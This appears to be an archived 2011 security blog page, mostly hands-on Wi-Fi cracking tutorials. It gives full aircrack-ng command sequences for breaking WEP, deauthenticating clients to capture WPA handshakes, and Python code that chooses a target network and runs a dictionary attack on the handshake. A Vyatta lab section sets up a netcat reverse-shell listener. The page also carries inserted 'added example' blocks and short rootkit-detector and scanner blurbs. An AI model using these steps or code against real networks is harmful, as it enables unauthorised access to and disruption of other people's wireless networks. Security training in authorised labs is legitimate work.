Tuesday, July 26, 2011

How to use Vyatta in VMware to simulate a hacking-from-inside-the-network scenario

In the classes I teach I use VMware Workstation 7 to build a penetration-testing lab,
with Vyatta acting as the router. Vyatta can be used to simulate many scenarios, such as attacking into a DMZ, and it supports zone-based firewalling.

You can download Vyatta from:
http://www.vyatta.org/downloads
Vyatta documentation:
http://www.vyatta.org/documentation

Lab Diagram



VM images:
R1 - Vyatta with 2 NICs: eth0 simulates the WAN side, eth1 the LAN side
Victim - Linux (you can use another operating system to build the vulnerable image)
Attacker - Blackbuntu Linux

VMware configuration:
1. Create a VMware Team and add a LAN segment to the team for the attacker network.
   See http://www.vmware.com/support/ws5/doc/ws_team_create_wizard.html for how to create a team in VMware.
2. Add the Vyatta image to the team; connect eth0 to NAT and eth1 to the team's LAN segment.
3. Add Blackbuntu to the team and connect its network interface (eth0 in my case) to the same LAN segment as Vyatta's eth1.
4. Connect the vulnerable image (Victim) to NAT.

Vyatta configuration:
Set the hostname, IP addresses and so on (all of this is entered in configuration mode):

set system host-name R2
set system domain-name blackbuntu.lan
set interfaces ethernet eth0 address 172.16.14.11/24
set system name-server 172.16.14.2
set system gateway-address 172.16.14.2
set interfaces ethernet eth1 address 192.168.1.1/24
set service ssh


Configuring DHCP Server:

set service dhcp-server shared-network-name ETH1_POOL subnet 192.168.1.0/24 start 192.168.1.20 stop 192.168.1.200
set service dhcp-server shared-network-name ETH1_POOL subnet 192.168.1.0/24 default-router 192.168.1.1
set service dhcp-server shared-network-name ETH1_POOL subnet 192.168.1.0/24 dns-server 172.16.14.2


## Configuring NAT

set service nat rule 1 source address 192.168.1.0/24
set service nat rule 1 outbound-interface eth0
set service nat rule 1 type masquerade



## Configuring Firewall:
## Define a firewall rule set (a named rule set drops anything it does not explicitly accept):

set firewall name ALLOW_ESTABLISHED
set firewall name ALLOW_ESTABLISHED rule 10
set firewall name ALLOW_ESTABLISHED rule 10 action accept
set firewall name ALLOW_ESTABLISHED rule 10 state established enable
set firewall name ALLOW_ESTABLISHED rule 10 state related enable


## Apply the rule set to the WAN interface, for forwarded traffic ("in") and for traffic to the router itself ("local"), so only replies to connections started from inside get through (SSH to the router therefore works from the LAN side only):

set interfaces ethernet eth0 firewall in name ALLOW_ESTABLISHED
set interfaces ethernet eth0 firewall local name ALLOW_ESTABLISHED
commit
save


After commit and save you should be able to ping and connect from Blackbuntu (Attacker) to the Victim (and reach the Internet), while nothing on the NAT side can start a connection into the LAN.

### Config port forward ###
Scenario/Question:
When we compromise the victim and want a reverse shell back to the Blackbuntu box, which sits inside the network behind NAT, what can we do?

Solution/Answer:
Configure a destination NAT (DNAT) rule for the listening port, plus a firewall rule that accepts the forwarded traffic.
Example: on the Blackbuntu box, listen on port 80 for the incoming connection with
$nc -lvvp 80
On Vyatta, configure DNAT like this:
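The DNAT listing that followed in the original post is missing from this copy of the page. What follows is an added example, not the author's configuration, written in the same Vyatta 6.x syntax as the listings above. It assumes the Blackbuntu box received 192.168.1.50 from the DHCP pool (substitute its real lease, or give it a static mapping) and that the payload on the victim connects back to the router's WAN address 172.16.14.11 on port 80:

```vyatta
## Forward TCP/80 arriving on the WAN interface to the attacker box
## (192.168.1.50 is an assumed lease from the ETH1_POOL range above)
set service nat rule 10 type destination
set service nat rule 10 inbound-interface eth0
set service nat rule 10 protocol tcp
set service nat rule 10 destination port 80
set service nat rule 10 inside-address address 192.168.1.50
set service nat rule 10 inside-address port 80

## The ALLOW_ESTABLISHED rule set on eth0 drops every new inbound connection,
## so the forwarded connection needs its own accept rule. Vyatta applies DNAT
## before the "in" firewall, so match the translated (inside) address here.
set firewall name ALLOW_ESTABLISHED rule 20 action accept
set firewall name ALLOW_ESTABLISHED rule 20 protocol tcp
set firewall name ALLOW_ESTABLISHED rule 20 destination address 192.168.1.50
set firewall name ALLOW_ESTABLISHED rule 20 destination port 80
commit
save
```

The firewall rule is the part that is easy to forget: without it the packet is translated and then silently dropped. Verify with show nat rules in operational mode, then from the victim run nc 172.16.14.11 80 and confirm that the nc listener on Blackbuntu reports the connection.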

Tuesday, July 19, 2011

How to use aircrack, this time on Windows

To use it on Windows you need to download the Windows build of aircrack. After downloading, put it on the C: drive (under My Computer).

Follow the steps below. Good luck.

NOTE: I’m going to base the rest of this tutorial on a card with the commview drivers installed!

- Next step is to download this .dll file (again only commview driver users):
http://darkircop.org/commview.dll

- Next up, download the aircrack package. Download it here:
http://dl.aircrack-ng.org/aircrack-ng-svn-win.zip

unzip the file to your c:\ drive (it can be another drive but this is the easiest)

Put the commview.dll file you just downloaded in the folder you extracted (it is called aircrack; if you extracted to your C: drive as suggested, it should be c:\aircrack\).

Now go to you place where you installed Commview in (the program itself) and look for a file called “ca2k.dll” (default install dir is c:\program files\commview for wifi\)

Copy this file to the same folder as the commview.dll (c:\aircrack\)

OKAY that was a whole lot! this was just to get everything ready! If you did all of this correct you’ll be able to move to the next step!
——————————————————————————————-

THE CRACKING:

Step 1:
- Open a command prompt (start > run > cmd.exe)

Step 2:
- type the following in the command prompt:

Quote:
cd c:\aircrack\

- HIT ENTER

Step 3:
- type the following in the same command prompt:

Quote:
airserv-ng -d commview.dll

- HIT ENTER
- You should see something like this coming up in the command prompt

Quote:
Opening card commview.dll
Setting chan 1
Opening sock port 666
Serving commview.dll chan 1 on port 666

Step 4:
- Open a new command prompt (LEAVE THE PREVIOUS ONE OPEN AT ALL TIMES!!)
- Type the following in the new command prompt:

Quote:
cd c:\aircrack\

-HIT ENTER

Step 5:
- Now type this in the same command prompt:

Quote:
airodump-ng 127.0.0.1:666

- HIT ENTER

note: if you know which channel the network you want to monitor is on, lock airodump-ng to that channel. I recommend this:

Quote:
airodump-ng --channel YOURCHANNELNUMBER 127.0.0.1:666

Airodump-ng should now start capturing data from the networks on the given channel. You will notice it isn't fast (unless it's a big company's network or similar), so we are going to speed this process up.
Take a note of the following:
1: BSSID of the network you want to crack = MAC address.
2: ESSID of the network you want to crack = name of the network (example: wifi16, mynetwork,…)
3: The mac of the card you are using to monitor the packets

LEAVE THE 2 COMMAND PROMPTS YOU ALREADY HAVE OPEN OPEN!!!

Step 6:
- Open a new command prompt
- Type in the following:

Quote:
cd c:\aircrack\

- HIT ENTER

Step 7:
- Type in the following in command prompt:

Quote:
aireplay-ng -1 0 -e ESSID-OF-THE-NETWORK-YOU-WANT-TO-CRACK -a BSSID:OF:THE:NETWORK:YOU:WANT:TO:CRACK -h MAC:OF:THE:CARD:YOU:ARE:USING:TO:MONITOR 127.0.0.1:666
yes quite confusing so a quick example:
ESSID = wifi16
BSSID = 11:22:33:44:55:66
MAC OF CARD I’M USING = 01:23:45:67:89:01

so that will get me:
aireplay-ng -1 0 -e wifi16 -a 11:22:33:44:55:66 -h 01:23:45:67:89:01 127.0.0.1:666

if all goes well you’ll get this as the outcome:

Quote:
Sending Authentication Request
Authentication successful
Sending Association Request
Association successful
if you get:

Quote:
AP rejects the source MAC address

It means MAC filtering is enabled on the network you want to crack and you’ll need to get hold of a mac address that’s allowed access.

if you keep getting:

Quote:
sending authentication request

Try moving closer to the AP!

Step 8:
in the same command prompt as the one in step 7 type:

Quote:
aireplay-ng -5 -b BSSID:OF:THE:NETWORK:YOU:WANT:TO:CRACK -h MAC:OF:THE:CARD:YOU:ARE:USING:TO:MONITOR 127.0.0.1:666
yes quite confusing once again so a quick example:
BSSID = 11:22:33:44:55:66
MAC OF CARD I’M USING = 01:23:45:67:89:01

so that will get me:
aireplay-ng -5 -b 11:22:33:44:55:66 -h 01:23:45:67:89:01 127.0.0.1:666

if all goes well you’ll get this:

Quote:
Waiting for a data packet…
Read #number packets…


Step 9:
if you wait a little bit you’ll soon be prompted with a packet like this:

Quote:
Size: 120, FromDS: 1, ToDS: 0 (WEP)
BSSID = the bssid
Dest. MAC = the dest mac
Source MAC = the source mac

0x0000: 0842 0201 000f b5ab cb9d 0014 6c7e 4080 .B..........l~@.
0x0010: 00d0 cf03 348c e0d2 4001 0000 2b62 7a01 ....4...@...+bz.
0x0020: 6d6d b1e0 92a8 039b ca6f cecb 5364 6e16 mm.......o..Sdn.
0x0030: a21d 2a70 49cf eef8 f9b9 279c 9020 30c4 ..*pI.....'.. 0.
0x0040: 7013 f7f3 5953 1234 5727 146c eeaa a594 p...YS.4W'.l....
0x0050: fd55 66a2 030f 472d 2682 3957 8429 9ca5 .Uf...G-&.9W.)..
0x0060: 517f 1544 bd82 ad77 fe9a cd99 a43c 52a1 Q..D...w.....<R.
0x0070: 0505 933f af2f 740e ...?./t.

Use this packet ?

note: size can vary, I always pressed in y and it worked
- press in Y
- HIT ENTER

You should see something like this coming up (or similar):

Quote:
Saving chosen packet in replay_src-0124-161120.cap
Data packet found!
Sending fragmented packet
Got RELAYED packet!!
Thats our ARP packet!
Trying to get 384 bytes of a keystream
Got RELAYED packet!!
Thats our ARP packet!
Trying to get 1500 bytes of a keystream
Got RELAYED packet!!
Thats our ARP packet!
Saving keystream in fragment-0124-161129.xor
Now you can build a packet with packetforge-ng out of that 1500 bytes keystream
Note 1: It doesn't need to be 1500 bytes!
Note 2: Take note of the keystream filename (fragment-0124-161129.xor in this run; yours will carry a different timestamp). You are going to need it in step 10.
AGAIN DON’T CLOSE THIS COMMAND PROMPT!!

if you keep getting:

Quote:
Data packet found!
Sending fragmented packet
No answer, repeating…
Trying a LLC NULL packet
Sending fragmented packet
No answer, repeating…
Sending fragmented packet


Just keep trying! It automatically starts over again (moving closer to the AP has been reported to help.)

anyways, if you got the bytes of keystream (everything worked) it’s time for the next step!

Step 10:
- Press CTRL + C in the command prompt used in step 8
- Now type in the following:

Quote:
packetforge-ng -0 -a BSSID:OF:THE:NETWORK:YOU:WANT:TO:CRACK -h MAC:OF:THE:CARD:YOU:ARE:USING:TO:MONITOR -k 192.168.1.100 -l 192.168.1.1 -y fragment-0124-161129.xor -w arp-request

(-l is a lowercase L, not the digit 1.) -k and -l are the destination and source IP of the forged ARP request; these dummy values work against most access points whatever the real subnet is. The -y argument is the keystream (.xor) file that step 9 saved, so use the exact filename printed there. The -w argument (arp-request here) is the filename for the forged packet; you can choose anything, but you must use the same name in the upcoming steps.

Step 11:
Now that we’ve got our ARP REQ packet we can start injecting!
Here’s how to do this.
- Go to the command prompt used in step 9
- Type in the following:

Quote:
aireplay-ng -2 -r arp-request 127.0.0.1:666

arp-request is again the filename you chose with -w in step 10.

You should now see something like this coming up:

Quote:
Size: 68, FromDS: 0, ToDS: 1 (WEP)
BSSID = 00:14:6C:7E:40:80
Dest. MAC = FF:FF:FF:FF:FF:FF
Source MAC = 00:0F:B5:AB:CB:9D

0x0000: 0841 0201 0014 6c7e 4080 000f b5ab cb9d .A....l~@.......
0x0010: ffff ffff ffff 8001 6c48 0000 0999 881a ........lH......
0x0020: 49fc 21ff 781a dc42 2f96 8fcc 9430 144d I.!.x..B/....0.M
0x0030: 3ab2 cff5 d4d1 6743 8056 24ec 9192 c1e1 :.....gC.V$.....
0x0040: d64f b709 .O..

Use this packet ?


- Type in Y
- HIT ENTER

This should come up now:

Quote:
Saving chosen packet in replay_src-0124-163529.cap
You should also start airodump-ng to capture replies.
End of file.
sent #numberOfPackets … (#number pps)


You’ll see the numberOfPackets rising really fast, you are injecting these packets now.

Step 12:
Now go back to the command prompt where you had airodump-ng in open
and press CTRL + C
now type in the following:

Quote:
airodump-ng --channel CHANNELYOUWANTTOCAPTUREFROM --write Filename 127.0.0.1:666

Note: Filename = the prefix of the file where the captured packets are saved. airodump-ng appends a counter, so the first capture is Filename-01.cap; this is the file used in the next step.

If all goes correct you should be capturing as much packets per second as you are injecting (maybe even more).

Step 13:
when you think you have enough…
note: 200000 min for 64bit (just capture 1Million to be sure)
…press CTRL + C in the command prompt that has airodump-ng running and enter the following:

Quote:
aircrack-ng -n 64 Filename-01.cap
note:
Filename-01.cap = the capture written in the previous step (Filename*.cap feeds all of them in at once if airodump-ng was restarted)
64 = the bit length of the key (128 for 128-bit keys, etc.)

Hacking Wi-Fi with aircrack

The wireless security types you commonly meet are:
open = no protection at all
WEP = has a password, but it can be cracked
WPA/WPA2-PSK = has a password and is somewhat harder to crack

So here we use the BackTrack OS.

airmon-ng - script used for switching the wireless network card to monitor mode
airodump-ng - for WLAN monitoring and capturing network packets
aireplay-ng - used to generate additional traffic on the wireless network
aircrack-ng - used to recover the WEP key, or launch a dictionary attack on WPA-PSK using the captured data

Setting up airmon-ng

First, try the commands below:
iwconfig (to see the wireless card's status and whether it appears as wlan0, wlan1, etc.)
airmon-ng start wlan0 (to put the card into monitor mode; replace wlan0 with your interface from iwconfig. The monitor interface this creates, usually mon0, is the name you use for the rest of the aircrack process.)

Other related Linux commands:

ifconfig (to list available network interfaces, my network card is listed as wlan0)
ifconfig wlan0 down (to stop the specified network card)
ifconfig wlan0 hw ether 00:11:22:33:44:55 (change the MAC address of a NIC; you can even take over the MAC of an associated client. The NIC must be down before changing its MAC address)
iwconfig wlan0 mode monitor (to set the network card in monitor mode)
ifconfig wlan0 up (to start the network card)
iwconfig - similar to ifconfig, but dedicated to the wireless interfaces.

Recon stage (airodump-ng)

airodump-ng mon0: this command does the scanning; "mon0" is the monitor interface created above. If your interface is wlan0, use "airodump-ng wlan0". You will get a screen like the one below.



The screenshot above shows BSSID, PWR, BEACONS, CH and ESSID.
We need BSSID, CH and ESSID for the next steps because:
BSSID = the MAC address of the wireless router (access point)
CH = the channel it uses
ESSID = the network name

Increase Traffic (aireplay-ng) - optional step for WEP cracking

Here is the command:
aireplay-ng -3 -b 00:0F:CC:7D:5A:74 -h 00:14:A5:2F:A7:DE -x 50 wlan0

-3 --> this specifies the type of attack, in our case ARP-request replay
-b ..... --> MAC address of access point
-h ..... --> MAC address of associated client from airodump
-x 50 --> limit to sending 50 packets per second
wlan0 --> our wireless network interface
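Both walkthroughs on this page have you read the BSSID, channel, ESSID and an associated client's MAC off the airodump-ng screen (step 5 of the Windows tutorial, and the recon stage here) before typing them into aireplay-ng. When airodump-ng runs with -w <prefix> it also writes <prefix>-01.csv with the same tables, which is easier to work from. The Python below is an added example, not part of either original post: it parses that CSV (the sample is constructed here, reusing the MACs from the aireplay-ng line above), picks the WEP network with the most IVs, and builds the channel-locked airodump-ng command and the aireplay-ng -3 command shown above. The mon0 interface name and the attacker's own MAC are assumptions.

```python
"""Pick a WEP target and its associated client from airodump-ng's CSV output
(written alongside the .cap when airodump-ng runs with -w <prefix>) and build
the follow-up commands. Added example; the CSV below is constructed."""
from dataclasses import dataclass, field

AP_HEADER = "BSSID, First time seen"          # first line of the access-point table
STA_HEADER = "Station MAC, First time seen"   # first line of the station table


@dataclass
class AccessPoint:
    bssid: str
    channel: int
    privacy: str            # OPN, WEP, WPA, WPA2 ...
    ivs: int                # "# IV" column: unique IVs captured so far
    essid: str
    clients: list = field(default_factory=list)   # associated station MACs


def parse_airodump_csv(text):
    """Return {bssid: AccessPoint}. Columns are fixed by position; the ESSID
    (column 13) may itself contain commas, so it is re-joined up to the Key column."""
    aps, section = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line.startswith(AP_HEADER):
            section = "ap"
            continue
        if line.startswith(STA_HEADER):
            section = "sta"
            continue
        cols = [c.strip() for c in line.split(",")]
        if section == "ap" and len(cols) >= 15:
            essid = ",".join(cols[13:-1])
            aps[cols[0]] = AccessPoint(cols[0], int(cols[3]), cols[5], int(cols[10]), essid)
        elif section == "sta" and len(cols) >= 6 and cols[5] in aps:
            # stations listed as "(not associated)" fail the membership test and are skipped
            aps[cols[5]].clients.append(cols[0])
    return aps


def pick_wep_target(aps, require_client=True):
    """WEP network with the most IVs so far. ARP replay (-3) needs a MAC the AP
    accepts, so by default only networks with an associated client qualify."""
    wep = [ap for ap in aps.values() if ap.privacy.startswith("WEP")]
    if require_client:
        wep = [ap for ap in wep if ap.clients]
    return max(wep, key=lambda ap: ap.ivs) if wep else None


def airodump_lock(ap, prefix, iface="mon0"):
    """Re-run airodump-ng locked to the target's channel and BSSID, writing
    <prefix>-01.cap (what aircrack-ng reads) instead of hopping channels."""
    return f"airodump-ng --channel {ap.channel} --bssid {ap.bssid} --write {prefix} {iface}"


def aireplay_arp_replay(ap, own_mac, iface="mon0", pps=50):
    """The ARP-request replay from the post. Without an associated client you
    must fake-authenticate first (aireplay-ng -1 0 -a <bssid> -h <own_mac>)
    and replay with your own MAC."""
    source = ap.clients[0] if ap.clients else own_mac
    return f"aireplay-ng -3 -b {ap.bssid} -h {source} -x {pps} {iface}"


# Constructed sample in airodump-ng's CSV layout: two WEP networks (one with a
# client, one with more IVs but no client) and one WPA2 network.
SAMPLE_CSV = """
BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
00:0F:CC:7D:5A:74, 2011-07-19 10:00:01, 2011-07-19 10:05:30,  6,  54, WEP, WEP, OPN, -45,      120,     2345,   0.  0.  0.  0,   6, wifi16,
00:1A:2B:3C:4D:5E, 2011-07-19 10:00:03, 2011-07-19 10:05:30, 11,  54, WEP, WEP, OPN, -70,       80,     9001,   0.  0.  0.  0,   5, guest,
00:AA:BB:CC:DD:EE, 2011-07-19 10:00:02, 2011-07-19 10:05:30,  1,  54, WPA2, CCMP, PSK, -60,      200,        0,   0.  0.  0.  0,   8, homelan1,

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
00:14:A5:2F:A7:DE, 2011-07-19 10:00:05, 2011-07-19 10:05:29, -50,      431, 00:0F:CC:7D:5A:74,wifi16
00:26:5E:11:22:33, 2011-07-19 10:01:00, 2011-07-19 10:05:00, -80,       12, (not associated),linksys,wifi16
"""

if __name__ == "__main__":
    target = pick_wep_target(parse_airodump_csv(SAMPLE_CSV))
    print(airodump_lock(target, "data"))
    print(aireplay_arp_replay(target, own_mac="00:11:22:33:44:55"))  # own MAC assumed
```

With require_client=False the "guest" network wins on IV count, and the replay command then uses your own MAC, which only works after a successful fake authentication (aireplay-ng -1), exactly the situation step 7 of the Windows tutorial handles. Note that the file aircrack-ng eventually reads is the .cap from the locked airodump-ng run, not the CSV.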



notes:
To test whether your nic is able to inject packets, you may want to try: aireplay-ng -9 wlan0. You may also want to read the information available -here-.
To see all available replay attacks, type just: aireplay-ng

Once aireplay-ng is replaying, the IV count for the target rises quickly in airodump-ng. Note that the capture file (.cap) used for cracking is written by airodump-ng, and only when it is run with the -w/--write <prefix> option (the same option step 12 of the Windows tutorial uses); the file is named <prefix>-01.cap. aireplay-ng itself only generates traffic.

Crack WEP (aircrack-ng)

WEP cracking is a simple process, only requiring collection of enough data to then extract the key and connect to the network. You can crack the WEP key while capturing data. In fact, aircrack-ng will re-attempt cracking the key after every 5000 packets.

To attempt recovering the WEP key, in a new terminal window, type:

aircrack-ng data*.cap (assuming your capture file is called data...cap, and is located in the same directory)



Notes:
If your data file contains ivs/packets from different access points, you may be presented with a list to choose which one to recover.
Usually, between 20k and 40k packets are needed to successfully crack a WEP key. It may sometimes work with as few as 10,000 packets with short keys.

Crack WPA or WPA2 PSK (aircrack-ng)

WPA, unlike WEP, derives fresh per-packet keys from a per-session key, so the statistical attack used against WEP does not apply. Cracking a WPA-PSK/WPA2-PSK key requires a dictionary attack against a captured handshake between an access point and a client. You therefore need to wait until a wireless client associates with the network (or deauthenticate an already connected client so that it reconnects automatically). All that needs to be captured is the initial four-way handshake between the access point and the client. Essentially, the weakness of WPA-PSK comes down to the passphrase: a short or weak passphrase makes it vulnerable to a dictionary attack, and that attack runs entirely offline against the capture.

To successfully crack a WPA-PSK network, you first need a capture file containing the handshake. Obtain it with airodump-ng as in the recon stage above, run with -w so the capture is written to disk; airodump-ng shows "WPA handshake: <BSSID>" in its top line once it has captured one.

You may also try to deauthenticate an associated client to speed up this process of capturing a handshake, using:

aireplay-ng --deauth 3 -a MAC_AP -c MAC_Client mon0 (where MAC_AP is the MAC address of the access point, MAC_Client is the MAC address of an associated client, and mon0 is your monitor interface).

The command output looks something like:
12:34:56  Waiting for beacon frame (BSSID: 00:11:22:33:44:55) on channel 6
12:34:56  Sending 64 directed DeAuth. STMAC: [66:55:44:33:22:11] [ 5|62 ACKs]

Note the two numbers in brackets, [ 5|62 ACKs]: they are the acknowledgements received from the client NIC (first number) and from the AP (second number). Both should be greater than zero. If the first number is zero, you are too far from the associated client for your deauth frames to reach it; try adding a reflector to your antenna (even a manila folder with aluminium foil stapled to it works as a reflector that noticeably increases range and concentrates the signal), or use a larger antenna.
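The section above says the attack is a dictionary attack on the handshake and that the weakness is the passphrase, without showing what is actually computed per word. The Python below is an added example (not part of the original post, and not aircrack-ng's code) of exactly that loop: derive the PMK from the candidate passphrase and SSID with PBKDF2, derive the PTK from the PMK, the two MACs and the two nonces, and recompute the MIC of EAPOL message 2 with the KCK; a match means the candidate is the passphrase. Everything the loop needs (SSID from the beacon, ANonce from message 1, SNonce, MIC and the EAPOL frame from message 2) is in the capture, so nothing touches the AP. The handshake here is constructed in code for the demo (build_message2 plays the client, with the SSID and MACs from the aireplay-ng example above); only the PBKDF2 step is checked against the IEEE 802.11i Annex H test vector ("password"/"IEEE").

```python
"""What aircrack-ng does per dictionary word against a captured WPA/WPA2-PSK
four-way handshake. Added example; the handshake below is constructed."""
import hashlib
import hmac

# EAPOL hdr 4 + descriptor 1 + key info 2 + key len 2 + replay 8 + nonce 32 + IV 16 + RSC 8 + ID 8
MIC_OFFSET = 81


def pmk_from_passphrase(passphrase, ssid):
    """PSK = PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf512(key, label, data):
    """IEEE 802.11i PRF-512: HMAC-SHA1 blocks over label || 0x00 || data || counter."""
    blocks = b"".join(
        hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
        for i in range(4))
    return blocks[:64]


def derive_ptk(pmk, ap_mac, sta_mac, anonce, snonce):
    """PTK from the PMK, both MACs and both nonces (sorted, so both sides agree).
    KCK = PTK[0:16] authenticates EAPOL frames, KEK = PTK[16:32], TK = PTK[32:48]
    (the CCMP PRF-384 is simply the first 48 bytes of this)."""
    data = (min(ap_mac, sta_mac) + max(ap_mac, sta_mac)
            + min(anonce, snonce) + max(anonce, snonce))
    return prf512(pmk, b"Pairwise key expansion", data)


def eapol_mic(kck, eapol_frame):
    """MIC over the whole EAPOL-Key frame with its MIC field zeroed. Key
    descriptor version 1 (WPA/TKIP) uses HMAC-MD5, version 2 (WPA2/CCMP)
    HMAC-SHA1 truncated to 16 bytes."""
    zeroed = eapol_frame[:MIC_OFFSET] + b"\x00" * 16 + eapol_frame[MIC_OFFSET + 16:]
    version = int.from_bytes(eapol_frame[5:7], "big") & 0x7
    if version == 1:
        return hmac.new(kck, zeroed, hashlib.md5).digest()
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:16]


def crack_handshake(ssid, ap_mac, sta_mac, anonce, snonce, eapol_msg2, wordlist):
    """Return the first candidate whose recomputed MIC equals the captured one."""
    captured = eapol_msg2[MIC_OFFSET:MIC_OFFSET + 16]
    for word in wordlist:
        kck = derive_ptk(pmk_from_passphrase(word, ssid), ap_mac, sta_mac, anonce, snonce)[:16]
        if hmac.compare_digest(eapol_mic(kck, eapol_msg2), captured):
            return word
    return None


def build_message2(ssid, passphrase, ap_mac, sta_mac, anonce, snonce, replay_counter=1):
    """Constructed EAPOL-Key message 2 (client -> AP) as a capture would hold it.
    Key info 0x010a = MIC bit | pairwise | descriptor version 2 (HMAC-SHA1 MIC)."""
    body = (b"\x02"                                   # descriptor type: RSN (WPA2)
            + (0x010A).to_bytes(2, "big")             # key information
            + (0).to_bytes(2, "big")                  # key length
            + replay_counter.to_bytes(8, "big")
            + snonce                                  # the nonce the client contributes
            + b"\x00" * 16 + b"\x00" * 8 + b"\x00" * 8   # key IV, RSC, key ID
            + b"\x00" * 16                            # MIC, filled in below
            + (0).to_bytes(2, "big"))                 # key data length (RSN IE omitted)
    frame = b"\x01\x03" + len(body).to_bytes(2, "big") + body   # EAPOL v1, type EAPOL-Key
    kck = derive_ptk(pmk_from_passphrase(passphrase, ssid), ap_mac, sta_mac, anonce, snonce)[:16]
    return frame[:MIC_OFFSET] + eapol_mic(kck, frame) + frame[MIC_OFFSET + 16:]


if __name__ == "__main__":
    # Constructed demo: SSID and MACs borrowed from the aireplay-ng example above.
    ap, sta = bytes.fromhex("000fcc7d5a74"), bytes.fromhex("0014a52fa7de")
    anonce, snonce = bytes(range(32)), bytes(range(32, 64))
    msg2 = build_message2("wifi16", "letmein99", ap, sta, anonce, snonce)
    print(crack_handshake("wifi16", ap, sta, anonce, snonce, msg2,
                          ["password", "wifi16", "12345678", "letmein99"]))
```

On a real capture the same loop is aircrack-ng -w wordlist.txt -b <MAC_AP> data-01.cap, with a much faster PBKDF2. The cost per candidate is 4096 HMAC-SHA1 iterations, which is why the outcome depends on the passphrase and not on the protocol: a passphrase in a wordlist falls in minutes, one that is not in any wordlist does not fall at all.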

Sunday, July 17, 2011

Computer Forensic Framework - PTK

Here I want to share one thing. You usually hear of PTK in connection with government staff, but there is a PTK for computer forensics too. Here I will explain a little about what this PTK is.

Computer forensics is the digital science used to analyse and identify information, code and the like.

In BackTrack 5 it is found under the forensic tools, so there is no need to download it; it is already there.
Besides tools and tricks, there is plenty of training available on the Internet.
PTK forensics is a computer forensic framework for the command-line tools in The Sleuth Kit plus many more software modules. This makes it usable and easy to investigate a system.

PTK forensics is more than just a new, highly professional graphical interface based on Ajax and other advanced technologies; it offers numerous features such as analysis, search and management of complex digital investigation cases.


PTK is available for Ubuntu, Mac OS X, CentOS and Kubuntu.
If you are using BackTrack 5, there is no need to download PTK because it is already included.

GMER is an application that detects and removes rootkits .

GMER is a tool for detecting and removing rootkits. The day before yesterday we talked about rootkits; in addition to that, here is another effective rootkit remover, GMER.
It scans for:

hidden processes
hidden threads
hidden modules
hidden services
hidden files
hidden disk sectors (MBR)
hidden Alternate Data Streams
hidden registry keys
drivers hooking SSDT
drivers hooking IDT
drivers hooking IRP calls
inline hooks


Saturday, July 16, 2011

AppWall: Protect Critical Web Applications with Radware Web Application Firewall.

APSolute Web Security and Compliance with AppWall: Taking Web Application Security to the Next Level

Radware’s AppWall® is a Web Application Firewall (WAF) appliance that secures Web applications and enables PCI compliance by mitigating web application security threats and vulnerabilities. It prevents data theft and manipulation of sensitive corporate and customer information.

Complete Web Application Protection

Full out-of-the-box coverage of the OWASP Top 10 threats, including injection, cross-site scripting (XSS), cross-site request forgery (CSRF), broken authentication and session management, and security misconfiguration.
Data leak prevention: identifying and blocking the transmission of sensitive information such as credit card numbers (CCN) and social security numbers (SSN).
Zero-day attack prevention: AppWall positive security profiles limit user input to what the application needs in order to function, which also blocks attacks for which no signature exists yet. The positive security profiles are a proven protection against zero-day attacks.
Protocol validation: AppWall enforces HTTP standards compliance to prevent evasion techniques and protocol exploits.
XML and web services protection: AppWall offers a rich set of XML and web services protections, including XML validity checks, web services method restrictions, and XML structure validation to enforce legitimate SOAP messages and XML payloads.
Web application vulnerabilities: signature protection offers accurate detection and blocking of web application vulnerability exploits; AppWall negative security profiles offer comprehensive attack protection.

Fully Addresses PCI DSS 2.0 Requirement 6.6

The Payment Card Industry (PCI) issued the Data Security Standard (DSS) to prevent financial fraud and information leakage from online businesses that process credit cards. AppWall fully addresses requirement 6.6 by:

Protecting credit card numbers leakage and use of web hacking techniques to disclose information processed through web applications
Out-of-the-box PCI policies
PCI compliance reports


Thursday, July 14, 2011

WPSCAN - WordPress Security & vulnerability Scanner




WPScan is a vulnerability scanner which checks the security of WordPress installations using a black box approach.

Details
Username enumeration (from author querystring and location header)
Weak password cracking (multithreaded)
Version enumeration (from generator meta tag)
Vulnerability enumeration (based on version)
Plugin enumeration (2220 most popular by default)
Plugin vulnerability enumeration (based on version) (todo)
Plugin enumeration list generation
Other misc WordPress checks (theme name, dir listing, ...)

RootRepeal – Rootkit Detector v1.3.5 Download Now



RootRepeal is a new rootkit detector currently in public beta. It is designed with the following goals in mind:

> Easy to use – a user with little to no computer experience should be able to use it.
> Powerful – it should be able to detect all publicly available rootkits.
> Stable – it should work on as many different system configurations as possible, and, in the event of an incompatibility, not crash the host computer.
> Safe – it will not use any rootkit-like techniques (hooking, etc.) to protect itself.

Currently, RootRepeal includes the following features:
Driver Scan – scans the system for kernel-mode drivers. Displays all drivers currently loaded, and shows if a driver has been hidden, and whether the driver’s file is visible on-disk.
Files Scan – scans any fixed drive on the system for hidden, locked or falsified* files.
Processes Scan – scans the system for processes. Displays all processes currently running, and shows if a processes is hidden or locked.
SSDT Scan – shows whether any of the functions in the System Service Descriptor Table (SSDT) are hooked.
Stealth Objects Scan – attempts to determine if any rootkits are active by looking for typical symptoms.
Hidden Services Scan – scans for hidden system services.
Shadow SSDT Scan – counterpart to the SSDT Scan, but deals mostly with graphics and window-related functions.

RootRepeal is currently in public beta. Whereas every effort has been made to ensure compatibility with every system configuration on Windows 2000, XP, 2003 and Vista, it cannot be guaranteed. There is always some risk when scanning for rootkits. Before running RootRepeal, please make sure you have backups of all important data and have saved all open documents.


10 free software downloads for your laptop

Have a laptop or netbook and want to get more out of it? You’re not alone. We’ve experienced the frustration of trying to keep data or bookmarks on a portable synchronised with those of a desktop PC or other laptops. We’ve struggled with diminishing battery life. We’ve needed assistance getting connected at hotspots or staying safe once online. And we’ve wondered how to take full advantage of USB flash drives.


But we’ve found help, and it’s all free. Here are ten no cost pieces of downloadable software that will solve your synchronisation, battery, Wi-Fi and USB woes. They’ll make it easier and more fun to get your work done, too.

Synchronisation Tools
